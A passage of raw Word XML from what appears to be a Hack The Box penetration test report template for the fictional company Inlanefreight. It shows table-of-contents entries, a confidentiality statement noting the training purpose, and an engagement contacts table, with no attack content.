          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718128 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FBBD3D3" w14:textId="4CFAB959" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718129" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Medium Term</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718129 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73BA3584" w14:textId="60469325" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718130" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Long Term</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718130 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49A4106C" w14:textId="0A489154" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718131" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Technical Findings Details</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718131 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3616E8A9" w14:textId="549852AF" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718132" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendices</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718132 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27E864AD" w14:textId="6F387057" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718133" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix A – Finding Severities</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718133 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="196B0D0D" w14:textId="2F6C7009" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718134" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix B – Exploited Hosts</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718134 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AE07B26" w14:textId="0B070F46" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718135" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix C – Compromised Users</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718135 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50E128F6" w14:textId="100215BF" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718136" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix D – Changes/Host Cleanup</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718136 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68ED3C22" w14:textId="2B27DC35" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718137" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix E – INLANEFREIGHT.LOCAL Domain Password Review</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718137 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14641607" w14:textId="7028CB3A" w:rsidR="00C53C23" w:rsidRDefault="002829EF">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Toc95329518"/>
      <w:bookmarkStart w:id="7" w:name="_Toc95329678"/>
      <w:r w:rsidR="00C53C23">
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED324A8" w14:textId="21674223" w:rsidR="00AB5E0D" w:rsidRPr="00AB5E0D" w:rsidRDefault="00AB5E0D" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc106718117"/>
      <w:r w:rsidRPr="0005031A">
        <w:lastRenderedPageBreak/>
        <w:t>Statement of Confidentiality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2C7D42DC" w14:textId="1160F8B5" w:rsidR="00AB5E0D" w:rsidRDefault="00AB5E0D" w:rsidP="00AB5E0D">
      <w:r>
        <w:t xml:space="preserve">The contents of this document have been developed by Hack The Box. Hack The Box considers the contents of this document to be proprietary and business confidential information. This information is to be used only in the performance of its intended use. This document may not be released to another vendor, business partner or contractor without prior written consent from Hack The Box. Additionally, no portion of this document may be communicated, reproduced, copied or distributed without the prior consent </w:t>
      </w:r>
      <w:r w:rsidR="007369DF">
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hack The Box. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7AC205" w14:textId="77777777" w:rsidR="00AB5E0D" w:rsidRDefault="00AB5E0D" w:rsidP="00AB5E0D">
      <w:r>
        <w:t>The contents of this document do not constitute legal advice. Hack The Box’s offer of services that relate to compliance, litigation or other legal interests are not intended as legal counsel and should not be taken as such.</w:t>
      </w:r>
      <w:r w:rsidR="007369DF">
        <w:t xml:space="preserve"> The assessment detailed herein is against a fictional company for training and examination purposes, and the vulnerabilities in no way affect Hack The Box external or internal infrastructure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C721A52" w14:textId="77777777" w:rsidR="00AB5E0D" w:rsidRDefault="00AB5E0D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBBD41F" w14:textId="5031EFE0" w:rsidR="00351832" w:rsidRDefault="00AB5E0D" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc95329519"/>
      <w:bookmarkStart w:id="10" w:name="_Toc95329679"/>
      <w:bookmarkStart w:id="11" w:name="_Toc106718118"/>
      <w:r w:rsidRPr="0005031A">
        <w:lastRenderedPageBreak/>
        <w:t>Engagement Contacts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3602"/>
        <w:gridCol w:w="3201"/>
        <w:gridCol w:w="3987"/>
      </w:tblGrid>
      <w:tr w:rsidR="00351832" w14:paraId="54931C88" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4CC59FDF" w14:textId="16F12B93" w:rsidR="00351832" w:rsidRPr="009C4CC4" w:rsidRDefault="00D14781" w:rsidP="00C55BC0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009C4CC4">
              <w:t xml:space="preserve">Inlanefreight </w:t>
            </w:r>
            <w:r w:rsidR="00351832" w:rsidRPr="009C4CC4">
              <w:t>Contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351832" w14:paraId="522E9F84"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2ABA642D" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="004539C5" w:rsidRDefault="00351832" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Contact </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BA1D2DC" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="00C55BC0" w:rsidRDefault="00351832" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55BC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A232AD3" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="004539C5" w:rsidRDefault="00351832" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Primary Contact Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351832" w14:paraId="121464BB"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61AA7400" w14:textId="45B86914" w:rsidR="00351832" w:rsidRPr="004539C5" w:rsidRDefault="00655232" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>Rachel Williams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6331172A" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="00C55BC0" w:rsidRDefault="00FA7BF9" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>Chief Executive Officer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D528710" w14:textId="04C3726C" w:rsidR="00351832" w:rsidRPr="00C55BC0" w:rsidRDefault="00655232" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>rachel@inlanefreight.loca</w:t>
            </w:r>
            <w:r w:rsidR="00C53C23" w:rsidRPr="00C55BC0">
              <w:t>l</w:t>
            </w:r>
            <w:r w:rsidR="00C53C23" w:rsidRPr="00C55BC0" w:rsidDel="00C53C23">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351832" w14:paraId="633F86A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33690D69" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="004539C5" w:rsidRDefault="00351832" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Secondary Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="603446D1" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="00C55BC0" w:rsidRDefault="00351832" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55BC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="508D9951" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="004539C5" w:rsidRDefault="00351832" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Secondary Contact Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00351832" w14:paraId="0231AE06"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171D806C" w14:textId="5F946762" w:rsidR="00351832" w:rsidRPr="004539C5" w:rsidRDefault="00655232" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>William Ley</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D47B36" w14:textId="77777777" w:rsidR="00351832" w:rsidRPr="00C55BC0" w:rsidRDefault="00CD184F" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>Chief Technical Officer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F87A780" w14:textId="2646B9B3" w:rsidR="00351832" w:rsidRPr="00C55BC0" w:rsidRDefault="00655232" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>wley@inlanefreight.local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BA338F3" w14:textId="77777777" w:rsidR="000C6D37" w:rsidRDefault="000C6D37" w:rsidP="00AB5E0D"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3602"/>
        <w:gridCol w:w="3201"/>
        <w:gridCol w:w="3987"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA7BF9" w14:paraId="554676D3" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
